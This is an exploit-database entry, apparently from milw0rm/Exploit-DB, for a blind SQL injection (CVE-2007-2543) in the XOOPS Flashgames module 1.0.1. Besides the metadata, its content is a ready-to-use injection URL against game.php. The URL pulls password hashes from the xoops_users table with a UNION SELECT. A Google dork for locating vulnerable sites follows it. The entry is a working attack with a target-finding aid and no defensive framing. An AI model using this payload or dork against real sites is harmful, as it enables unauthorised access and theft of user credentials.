XOOPS Flashgames Module 1.0.1 - SQL Injection

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2007-05-03 
date_updated: 2007-05-04 
verified: 1 
codes: OSVDB-34472;CVE-2007-2543 
tags: 
aliases:  
screenshot_url:  
application_url: 

================================================================

Xoops Flashgames Module  1.0.1 Remote Blind SQL Injection

================================================================

Bulan: Cyber-security.org

================================================================

Exploit:
/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

================================================================

Google dork: inurl:modules/flashgames/

================================================================

# milw0rm.com [2007-05-04]